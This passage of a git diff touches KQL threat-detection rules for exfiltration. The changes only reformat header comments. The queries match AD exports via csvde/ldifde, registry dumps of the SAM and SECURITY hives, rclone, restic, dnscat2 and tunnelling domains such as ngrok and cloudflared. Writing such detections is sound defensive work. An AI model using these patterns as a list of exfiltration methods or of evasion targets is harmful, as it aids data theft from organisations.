 | where ((FolderPath endswith "\\csvde.exe" or ProcessVersionInfoOriginalFileName =~ "csvde.exe") and ProcessCommandLine contains " -f") and (not(ProcessCommandLine contains " -i"))
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/active_directory_structure_export_via_ldifde_exe.kql b/KQL/rules/Exfiltration/active_directory_structure_export_via_ldifde_exe.kql
index 5f3de5a1..7867876f 100644
--- a/KQL/rules/Exfiltration/active_directory_structure_export_via_ldifde_exe.kql
+++ b/KQL/rules/Exfiltration/active_directory_structure_export_via_ldifde_exe.kql
@@ -1,10 +1,10 @@
-// Title: Active Directory Structure Export Via Ldifde.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-03-14
-// Level: medium
-// Description: Detects the execution of "ldifde.exe" in order to export organizational Active Directory structure.
-// MITRE Tactic: Exfiltration
-// Tags: attack.exfiltration
-
-DeviceProcessEvents
+// Title: Active Directory Structure Export Via Ldifde.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-14
+// Level: medium
+// Description: Detects the execution of "ldifde.exe" in order to export organizational Active Directory structure.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "-f" and (FolderPath endswith "\\ldifde.exe" or ProcessVersionInfoOriginalFileName =~ "ldifde.exe")) and (not(ProcessCommandLine contains " -i"))
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/arbitrary_file_download_via_configsecuritypolicy_exe.kql b/KQL/rules/Exfiltration/arbitrary_file_download_via_configsecuritypolicy_exe.kql
index 059a5181..841d0dc5 100644
--- a/KQL/rules/Exfiltration/arbitrary_file_download_via_configsecuritypolicy_exe.kql
+++ b/KQL/rules/Exfiltration/arbitrary_file_download_via_configsecuritypolicy_exe.kql
@@ -1,12 +1,12 @@
-// Title: Arbitrary File Download Via ConfigSecurityPolicy.EXE
-// Author: frack113
-// Date: 2021-11-26
-// Level: medium
-// Description: Detects the execution of "ConfigSecurityPolicy.EXE", a binary part of Windows Defender used to manage settings in Windows Defender.
-// Users can configure different pilot collections for each of the co-management workloads.
-// It can be abused by attackers in order to upload or download files.
-// MITRE Tactic: Exfiltration
-// Tags: attack.exfiltration, attack.t1567
-
-DeviceProcessEvents
+// Title: Arbitrary File Download Via ConfigSecurityPolicy.EXE
+// Author: frack113
+// Date: 2021-11-26
+// Level: medium
+// Description: Detects the execution of "ConfigSecurityPolicy.EXE", a binary part of Windows Defender used to manage settings in Windows Defender.
+// Users can configure different pilot collections for each of the co-management workloads.
+// It can be abused by attackers in order to upload or download files.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1567
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "ConfigSecurityPolicy.exe" or FolderPath endswith "\\ConfigSecurityPolicy.exe" or ProcessVersionInfoOriginalFileName =~ "ConfigSecurityPolicy.exe") and (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://")
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_initiated.kql b/KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_initiated.kql
index 1f8f07f6..405d7d7e 100644
--- a/KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_initiated.kql
+++ b/KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_initiated.kql
@@ -1,14 +1,14 @@
-// Title: Communication To Ngrok Tunneling Service Initiated
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-11-03
-// Level: high
-// Description: Detects an executable initiating a network connection to "ngrok" tunneling domains.
-// Attackers were seen using this "ngrok" in order to store their second stage payloads and malware.
-// While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.
-// MITRE Tactic: Exfiltration
-// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1568.002, attack.t1572, attack.t1090, attack.t1102, attack.s0508
-// False Positives:
-// - Legitimate use of the ngrok service.
-
-DeviceNetworkEvents
+// Title: Communication To Ngrok Tunneling Service Initiated
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-11-03
+// Level: high
+// Description: Detects an executable initiating a network connection to "ngrok" tunneling domains.
+// Attackers were seen using this "ngrok" in order to store their second stage payloads and malware.
+// While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1568.002, attack.t1572, attack.t1090, attack.t1102, attack.s0508
+// False Positives:
+// - Legitimate use of the ngrok service.
+
+DeviceNetworkEvents
 | where RemoteUrl contains "tunnel.us.ngrok.com" or RemoteUrl contains "tunnel.eu.ngrok.com" or RemoteUrl contains "tunnel.ap.ngrok.com" or RemoteUrl contains "tunnel.au.ngrok.com" or RemoteUrl contains "tunnel.sa.ngrok.com" or RemoteUrl contains "tunnel.jp.ngrok.com" or RemoteUrl contains "tunnel.in.ngrok.com"
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_linux.kql b/KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_linux.kql
index f842d018..e3a2d96c 100644
--- a/KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_linux.kql
+++ b/KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_linux.kql
@@ -1,12 +1,12 @@
-// Title: Communication To Ngrok Tunneling Service - Linux
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-11-03
-// Level: high
-// Description: Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors
-// MITRE Tactic: Exfiltration
-// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1568.002, attack.t1572, attack.t1090, attack.t1102, attack.s0508
-// False Positives:
-// - Legitimate use of ngrok
-
-DeviceNetworkEvents
+// Title: Communication To Ngrok Tunneling Service - Linux
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-11-03
+// Level: high
+// Description: Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1568.002, attack.t1572, attack.t1090, attack.t1102, attack.s0508
+// False Positives:
+// - Legitimate use of ngrok
+
+DeviceNetworkEvents
 | where RemoteUrl contains "tunnel.us.ngrok.com" or RemoteUrl contains "tunnel.eu.ngrok.com" or RemoteUrl contains "tunnel.ap.ngrok.com" or RemoteUrl contains "tunnel.au.ngrok.com" or RemoteUrl contains "tunnel.sa.ngrok.com" or RemoteUrl contains "tunnel.jp.ngrok.com" or RemoteUrl contains "tunnel.in.ngrok.com"
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/disk_image_creation_via_hdiutil_macos.kql b/KQL/rules/Exfiltration/disk_image_creation_via_hdiutil_macos.kql
index ffa803a4..acad549f 100644
--- a/KQL/rules/Exfiltration/disk_image_creation_via_hdiutil_macos.kql
+++ b/KQL/rules/Exfiltration/disk_image_creation_via_hdiutil_macos.kql
@@ -1,12 +1,12 @@
-// Title: Disk Image Creation Via Hdiutil - MacOS
-// Author: Omar Khaled (@beacon_exe)
-// Date: 2024-08-10
-// Level: medium
-// Description: Detects the execution of the hdiutil utility in order to create a disk image.
-// MITRE Tactic: Exfiltration
-// Tags: attack.exfiltration
-// False Positives:
-// - Legitimate usage of hdiutil by administrators and users.
-
-DeviceProcessEvents
+// Title: Disk Image Creation Via Hdiutil - MacOS
+// Author: Omar Khaled (@beacon_exe)
+// Date: 2024-08-10
+// Level: medium
+// Description: Detects the execution of the hdiutil utility in order to create a disk image.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration
+// False Positives:
+// - Legitimate usage of hdiutil by administrators and users.
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "create" and FolderPath endswith "/hdiutil"
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/dns_exfiltration_and_tunneling_tools_execution.kql b/KQL/rules/Exfiltration/dns_exfiltration_and_tunneling_tools_execution.kql
index 32245d57..37691026 100644
--- a/KQL/rules/Exfiltration/dns_exfiltration_and_tunneling_tools_execution.kql
+++ b/KQL/rules/Exfiltration/dns_exfiltration_and_tunneling_tools_execution.kql
@@ -1,12 +1,12 @@
-// Title: DNS Exfiltration and Tunneling Tools Execution
-// Author: Daniil Yugoslavskiy, oscd.community
-// Date: 2019-10-24
-// Level: high
-// Description: Well-known DNS Exfiltration tools execution
-// MITRE Tactic: Exfiltration
-// Tags: attack.exfiltration, attack.t1048.001, attack.command-and-control, attack.t1071.004, attack.t1132.001
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: DNS Exfiltration and Tunneling Tools Execution
+// Author: Daniil Yugoslavskiy, oscd.community
+// Date: 2019-10-24
+// Level: high
+// Description: Well-known DNS Exfiltration tools execution
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1048.001, attack.command-and-control, attack.t1071.004, attack.t1132.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where FolderPath endswith "\\iodine.exe" or FolderPath contains "\\dnscat2"
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/email_exifiltration_via_powershell.kql b/KQL/rules/Exfiltration/email_exifiltration_via_powershell.kql
index ca744e1f..5a0a00a1 100644
--- a/KQL/rules/Exfiltration/email_exifiltration_via_powershell.kql
+++ b/KQL/rules/Exfiltration/email_exifiltration_via_powershell.kql
@@ -1,10 +1,10 @@
-// Title: Email Exifiltration Via Powershell
-// Author: Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)
-// Date: 2022-09-09
-// Level: high
-// Description: Detects email exfiltration via powershell cmdlets
-// MITRE Tactic: Exfiltration
-// Tags: attack.exfiltration
-
-DeviceProcessEvents
+// Title: Email Exifiltration Via Powershell
+// Author: Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)
+// Date: 2022-09-09
+// Level: high
+// Description: Detects email exfiltration via powershell cmdlets
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "Add-PSSnapin" and ProcessCommandLine contains "Get-Recipient" and ProcessCommandLine contains "-ExpandProperty" and ProcessCommandLine contains "EmailAddresses" and ProcessCommandLine contains "SmtpAddress" and ProcessCommandLine contains "-hidetableheaders") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/exports_critical_registry_keys_to_a_file.kql b/KQL/rules/Exfiltration/exports_critical_registry_keys_to_a_file.kql
index f03b6c91..4590dfd7 100644
--- a/KQL/rules/Exfiltration/exports_critical_registry_keys_to_a_file.kql
+++ b/KQL/rules/Exfiltration/exports_critical_registry_keys_to_a_file.kql
@@ -1,12 +1,12 @@
-// Title: Exports Critical Registry Keys To a File
-// Author: Oddvar Moe, Sander Wiebing, oscd.community
-// Date: 2020-10-12
-// Level: high
-// Description: Detects the export of a crital Registry key to a file.
-// MITRE Tactic: Exfiltration
-// Tags: attack.exfiltration, attack.discovery, attack.t1012
-// False Positives:
-// - Dumping hives for legitimate purpouse i.e. backup or forensic investigation
-
-DeviceProcessEvents
+// Title: Exports Critical Registry Keys To a File
+// Author: Oddvar Moe, Sander Wiebing, oscd.community
+// Date: 2020-10-12
+// Level: high
+// Description: Detects the export of a crital Registry key to a file.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.discovery, attack.t1012
+// False Positives:
+// - Dumping hives for legitimate purpouse i.e. backup or forensic investigation
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -E " or ProcessCommandLine contains " /E " or ProcessCommandLine contains " –E " or ProcessCommandLine contains " —E " or ProcessCommandLine contains " ―E ") and (ProcessCommandLine contains "hklm" or ProcessCommandLine contains "hkey_local_machine") and (ProcessCommandLine endswith "\\system" or ProcessCommandLine endswith "\\sam" or ProcessCommandLine endswith "\\security") and (FolderPath endswith "\\regedit.exe" or ProcessVersionInfoOriginalFileName =~ "REGEDIT.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/exports_registry_key_to_a_file.kql b/KQL/rules/Exfiltration/exports_registry_key_to_a_file.kql
index 973dff8c..f86b39b8 100644
--- a/KQL/rules/Exfiltration/exports_registry_key_to_a_file.kql
+++ b/KQL/rules/Exfiltration/exports_registry_key_to_a_file.kql
@@ -1,12 +1,12 @@
-// Title: Exports Registry Key To a File
-// Author: Oddvar Moe, Sander Wiebing, oscd.community
-// Date: 2020-10-07
-// Level: low
-// Description: Detects the export of the target Registry key to a file.
-// MITRE Tactic: Exfiltration
-// Tags: attack.exfiltration, attack.discovery, attack.t1012
-// False Positives:
-// - Legitimate export of keys
-
-DeviceProcessEvents
+// Title: Exports Registry Key To a File
+// Author: Oddvar Moe, Sander Wiebing, oscd.community
+// Date: 2020-10-07
+// Level: low
+// Description: Detects the export of the target Registry key to a file.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.discovery, attack.t1012
+// False Positives:
+// - Legitimate export of keys
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains " -E " or ProcessCommandLine contains " /E " or ProcessCommandLine contains " –E " or ProcessCommandLine contains " —E " or ProcessCommandLine contains " ―E ") and (FolderPath endswith "\\regedit.exe" or ProcessVersionInfoOriginalFileName =~ "REGEDIT.EXE")) and (not(((ProcessCommandLine contains "hklm" or ProcessCommandLine contains "hkey_local_machine") and (ProcessCommandLine endswith "\\system" or ProcessCommandLine endswith "\\sam" or ProcessCommandLine endswith "\\security"))))
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/lolbas_data_exfiltration_by_datasvcutil_exe.kql b/KQL/rules/Exfiltration/lolbas_data_exfiltration_by_datasvcutil_exe.kql
index d38ffa8d..aea9618f 100644
--- a/KQL/rules/Exfiltration/lolbas_data_exfiltration_by_datasvcutil_exe.kql
+++ b/KQL/rules/Exfiltration/lolbas_data_exfiltration_by_datasvcutil_exe.kql
@@ -1,14 +1,14 @@
-// Title: LOLBAS Data Exfiltration by DataSvcUtil.exe
-// Author: Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger
-// Date: 2021-09-30
-// Level: medium
-// Description: Detects when a user performs data exfiltration by using DataSvcUtil.exe
-// MITRE Tactic: Exfiltration
-// Tags: attack.exfiltration, attack.t1567
-// False Positives:
-// - DataSvcUtil.exe being used may be performed by a system administrator.
-// - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
-// - DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
-
-DeviceProcessEvents
+// Title: LOLBAS Data Exfiltration by DataSvcUtil.exe
+// Author: Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger
+// Date: 2021-09-30
+// Level: medium
+// Description: Detects when a user performs data exfiltration by using DataSvcUtil.exe
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1567
+// False Positives:
+// - DataSvcUtil.exe being used may be performed by a system administrator.
+// - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
+// - DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/in:" or ProcessCommandLine contains "/out:" or ProcessCommandLine contains "/uri:") and (FolderPath endswith "\\DataSvcUtil.exe" or ProcessVersionInfoOriginalFileName =~ "DataSvcUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/network_connection_initiated_to_btunnels_domains.kql b/KQL/rules/Exfiltration/network_connection_initiated_to_btunnels_domains.kql
index 88eeb015..fac0a202 100644
--- a/KQL/rules/Exfiltration/network_connection_initiated_to_btunnels_domains.kql
+++ b/KQL/rules/Exfiltration/network_connection_initiated_to_btunnels_domains.kql
@@ -1,13 +1,13 @@
-// Title: Network Connection Initiated To BTunnels Domains
-// Author: Kamran Saifullah
-// Date: 2024-09-13
-// Level: medium
-// Description: Detects network connections to BTunnels domains initiated by a process on the system.
-// Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
-// MITRE Tactic: Exfiltration
-// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1572
-// False Positives:
-// - Legitimate use of BTunnels will also trigger this.
-
-DeviceNetworkEvents
+// Title: Network Connection Initiated To BTunnels Domains
+// Author: Kamran Saifullah
+// Date: 2024-09-13
+// Level: medium
+// Description: Detects network connections to BTunnels domains initiated by a process on the system.
+// Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1572
+// False Positives:
+// - Legitimate use of BTunnels will also trigger this.
+
+DeviceNetworkEvents
 | where RemoteUrl endswith ".btunnel.co.in"
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/network_connection_initiated_to_cloudflared_tunnels_domains.kql b/KQL/rules/Exfiltration/network_connection_initiated_to_cloudflared_tunnels_domains.kql
index bc91a970..c3702834 100644
--- a/KQL/rules/Exfiltration/network_connection_initiated_to_cloudflared_tunnels_domains.kql
+++ b/KQL/rules/Exfiltration/network_connection_initiated_to_cloudflared_tunnels_domains.kql
@@ -1,13 +1,13 @@
-// Title: Network Connection Initiated To Cloudflared Tunnels Domains
-// Author: Kamran Saifullah, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024-05-27
-// Level: medium
-// Description: Detects network connections to Cloudflared tunnels domains initiated by a process on the system.
-// Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
-// MITRE Tactic: Exfiltration
-// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1572
-// False Positives:
-// - Legitimate use of cloudflare tunnels will also trigger this.
-
-DeviceNetworkEvents
+// Title: Network Connection Initiated To Cloudflared Tunnels Domains
+// Author: Kamran Saifullah, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-05-27
+// Level: medium
+// Description: Detects network connections to Cloudflared tunnels domains initiated by a process on the system.
+// Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1572
+// False Positives:
+// - Legitimate use of cloudflare tunnels will also trigger this.
+
+DeviceNetworkEvents
 | where RemoteUrl endswith ".v2.argotunnel.com" or RemoteUrl endswith "protocol-v2.argotunnel.com" or RemoteUrl endswith "trycloudflare.com" or RemoteUrl endswith "update.argotunnel.com"
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/network_connection_initiated_to_devtunnels_domain.kql b/KQL/rules/Exfiltration/network_connection_initiated_to_devtunnels_domain.kql
index 5999853b..1a096444 100644
--- a/KQL/rules/Exfiltration/network_connection_initiated_to_devtunnels_domain.kql
+++ b/KQL/rules/Exfiltration/network_connection_initiated_to_devtunnels_domain.kql
@@ -1,12 +1,12 @@
-// Title: Network Connection Initiated To DevTunnels Domain
-// Author: Kamran Saifullah
-// Date: 2023-11-20
-// Level: medium
-// Description: Detects network connections to Devtunnels domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
-// MITRE Tactic: Exfiltration
-// Tags: attack.exfiltration, attack.command-and-control, attack.t1567.001, attack.t1572
-// False Positives:
-// - Legitimate use of Devtunnels will also trigger this.
-
-DeviceNetworkEvents
+// Title: Network Connection Initiated To DevTunnels Domain
+// Author: Kamran Saifullah
+// Date: 2023-11-20
+// Level: medium
+// Description: Detects network connections to Devtunnels domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.command-and-control, attack.t1567.001, attack.t1572
+// False Positives:
+// - Legitimate use of Devtunnels will also trigger this.
+
+DeviceNetworkEvents
 | where RemoteUrl endswith ".devtunnels.ms"
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/network_connection_initiated_to_mega_nz.kql b/KQL/rules/Exfiltration/network_connection_initiated_to_mega_nz.kql
index d218d981..bcb89fe0 100644
--- a/KQL/rules/Exfiltration/network_connection_initiated_to_mega_nz.kql
+++ b/KQL/rules/Exfiltration/network_connection_initiated_to_mega_nz.kql
@@ -1,13 +1,13 @@
-// Title: Network Connection Initiated To Mega.nz
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-12-06
-// Level: low
-// Description: Detects a network connection initiated by a binary to "api.mega.co.nz".
-// Attackers were seen abusing file sharing websites similar to "mega.nz" in order to upload/download additional payloads.
-// MITRE Tactic: Exfiltration
-// Tags: attack.exfiltration, attack.t1567.002
-// False Positives:
-// - Legitimate MEGA installers and utilities are expected to communicate with this domain. Exclude hosts that are known to be allowed to use this tool.
-
-DeviceNetworkEvents
+// Title: Network Connection Initiated To Mega.nz
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-12-06
+// Level: low
+// Description: Detects a network connection initiated by a binary to "api.mega.co.nz".
+// Attackers were seen abusing file sharing websites similar to "mega.nz" in order to upload/download additional payloads.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1567.002
+// False Positives:
+// - Legitimate MEGA installers and utilities are expected to communicate with this domain. Exclude hosts that are known to be allowed to use this tool.
+
+DeviceNetworkEvents
 | where RemoteUrl endswith "mega.co.nz" or RemoteUrl endswith "mega.nz"
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/network_connection_initiated_to_visual_studio_code_tunnels_domain.kql b/KQL/rules/Exfiltration/network_connection_initiated_to_visual_studio_code_tunnels_domain.kql
index c0337f00..77c83489 100644
--- a/KQL/rules/Exfiltration/network_connection_initiated_to_visual_studio_code_tunnels_domain.kql
+++ b/KQL/rules/Exfiltration/network_connection_initiated_to_visual_studio_code_tunnels_domain.kql
@@ -1,12 +1,12 @@
-// Title: Network Connection Initiated To Visual Studio Code Tunnels Domain
-// Author: Kamran Saifullah
-// Date: 2023-11-20
-// Level: medium
-// Description: Detects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
-// MITRE Tactic: Exfiltration
-// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1572
-// False Positives:
-// - Legitimate use of Visual Studio Code tunnel will also trigger this.
-
-DeviceNetworkEvents
+// Title: Network Connection Initiated To Visual Studio Code Tunnels Domain
+// Author: Kamran Saifullah
+// Date: 2023-11-20
+// Level: medium
+// Description: Detects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1572
+// False Positives:
+// - Legitimate use of Visual Studio Code tunnel will also trigger this.
+
+DeviceNetworkEvents
 | where RemoteUrl endswith ".tunnels.api.visualstudio.com"
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/process_initiated_network_connection_to_ngrok_domain.kql b/KQL/rules/Exfiltration/process_initiated_network_connection_to_ngrok_domain.kql
index 8ab40157..e9168354 100644
--- a/KQL/rules/Exfiltration/process_initiated_network_connection_to_ngrok_domain.kql
+++ b/KQL/rules/Exfiltration/process_initiated_network_connection_to_ngrok_domain.kql
@@ -1,14 +1,14 @@
-// Title: Process Initiated Network Connection To Ngrok Domain
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-07-16
-// Level: high
-// Description: Detects an executable initiating a network connection to "ngrok" domains.
-// Attackers were seen using this "ngrok" in order to store their second stage payloads and malware.
-// While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.
-// MITRE Tactic: Exfiltration
-// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1572, attack.t1102
-// False Positives:
-// - Legitimate use of the ngrok service.
-
-DeviceNetworkEvents
+// Title: Process Initiated Network Connection To Ngrok Domain
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-07-16
+// Level: high
+// Description: Detects an executable initiating a network connection to "ngrok" domains.
+// Attackers were seen using this "ngrok" in order to store their second stage payloads and malware.
+// While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1572, attack.t1102
+// False Positives:
+// - Legitimate use of the ngrok service.
+
+DeviceNetworkEvents
 | where RemoteUrl endswith ".ngrok-free.app" or RemoteUrl endswith ".ngrok-free.dev" or RemoteUrl endswith ".ngrok.app" or RemoteUrl endswith ".ngrok.dev" or RemoteUrl endswith ".ngrok.io"
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/pua_rclone_execution.kql b/KQL/rules/Exfiltration/pua_rclone_execution.kql
index e979ab9b..4ed26d96 100644
--- a/KQL/rules/Exfiltration/pua_rclone_execution.kql
+++ b/KQL/rules/Exfiltration/pua_rclone_execution.kql
@@ -1,10 +1,10 @@
-// Title: PUA - Rclone Execution
-// Author: Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group
-// Date: 2021-05-10
-// Level: high
-// Description: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc
-// MITRE Tactic: Exfiltration
-// Tags: attack.exfiltration, attack.t1567.002
-
-DeviceProcessEvents
+// Title: PUA - Rclone Execution
+// Author: Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group
+// Date: 2021-05-10
+// Level: high
+// Description: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1567.002
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "--config " and ProcessCommandLine contains "--no-check-certificate " and ProcessCommandLine contains " copy ") or ((ProcessCommandLine contains "pass" or ProcessCommandLine contains "user" or ProcessCommandLine contains "copy" or ProcessCommandLine contains "sync" or ProcessCommandLine contains "config" or ProcessCommandLine contains "lsd" or ProcessCommandLine contains "remote" or ProcessCommandLine contains "ls" or ProcessCommandLine contains "mega" or ProcessCommandLine contains "pcloud" or ProcessCommandLine contains "ftp" or ProcessCommandLine contains "ignore-existing" or ProcessCommandLine contains "auto-confirm" or ProcessCommandLine contains "transfers" or ProcessCommandLine contains "multi-thread-streams" or ProcessCommandLine contains "no-check-certificate ") and (FolderPath endswith "\\rclone.exe" or ProcessVersionInfoFileDescription =~ "Rsync for cloud storage"))
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/pua_restic_backup_tool_execution.kql b/KQL/rules/Exfiltration/pua_restic_backup_tool_execution.kql
index 185731b4..5dcd00a2 100644
--- a/KQL/rules/Exfiltration/pua_restic_backup_tool_execution.kql
+++ b/KQL/rules/Exfiltration/pua_restic_backup_tool_execution.kql
@@ -1,14 +1,14 @@
-// Title: PUA - Restic Backup Tool Execution
-// Author: Nounou Mbeiri, Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2025-10-17
-// Level: high
-// Description: Detects the execution of the Restic backup tool, which can be used for data exfiltration.
-// Threat actors may leverage Restic to back up and exfiltrate sensitive data to remote storage locations, including cloud services.
-// If not legitimately used in the enterprise environment, its presence may indicate malicious activity.
-// MITRE Tactic: Exfiltration
-// Tags: attack.exfiltration, attack.t1048, attack.t1567.002
-// False Positives:
-// - Legitimate use of Restic for backup purposes within the organization.
-
-DeviceProcessEvents
+// Title: PUA - Restic Backup Tool Execution
+// Author: Nounou Mbeiri, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-10-17
+// Level: high
+// Description: Detects the execution of the Restic backup tool, which can be used for data exfiltration.
+// Threat actors may leverage Restic to back up and exfiltrate sensitive data to remote storage locations, including cloud services.
+// If not legitimately used in the enterprise environment, its presence may indicate malicious activity.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1048, attack.t1567.002
+// False Positives:
+// - Legitimate use of Restic for backup purposes within the organization.
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "sftp:" or ProcessCommandLine contains "rest:http" or ProcessCommandLine contains "s3:s3." 
or ProcessCommandLine contains "s3.http" or ProcessCommandLine contains "azure:" or ProcessCommandLine contains " gs:" or ProcessCommandLine contains "rclone:" or ProcessCommandLine contains "swift:" or ProcessCommandLine contains " b2:") and (ProcessCommandLine contains " init " and ProcessCommandLine contains " -r ")) or ((ProcessCommandLine contains "--password-file" and ProcessCommandLine contains "init" and ProcessCommandLine contains " -r ") or (ProcessCommandLine contains "--use-fs-snapshot" and ProcessCommandLine contains "backup" and ProcessCommandLine contains " -r "))
\ No newline at end of file
diff --git a/KQL/rules/Exfiltration/python_webserver_execution_linux.kql b/KQL/rules/Exfiltration/python_webserver_execution_linux.kql
index 2e97304e..175e8487 100644
--- a/KQL/rules/Exfiltration/python_webserver_execution_linux.kql
+++ b/KQL/rules/Exfiltration/python_webserver_execution_linux.kql
@@ -1,14 +1,14 @@
-// Title: Python WebServer Execution - Linux
-// Author: Mohamed LAKRI
-// Date: 2025-10-17
-// Level: medium
-// Description: Detects the execution of Python web servers via command line interface (CLI).
-// After gaining access to target systems, adversaries may use Python's built-in HTTP server modules to quickly establish a web server without requiring additional software.
-// This technique is commonly used in post-exploitation scenarios as it provides a simple method for transferring files between the compromised host and attacker-controlled systems.
-// MITRE Tactic: Exfiltration
-// Tags: attack.exfiltration, attack.t1048.003
-// False Positives:
-// - Testing or development activity
-
-DeviceProcessEvents
+// Title: Python WebServer Execution - Linux
+// Author: Mohamed LAKRI
+// Date: 2025-10-17
+// Level: medium
+// Description: Detects the execution of Python web servers via command line interface (CLI).
+// After gaining access to target systems, adversaries may use Python's built-in HTTP server modules to quickly establish a web server without requiring additional software.
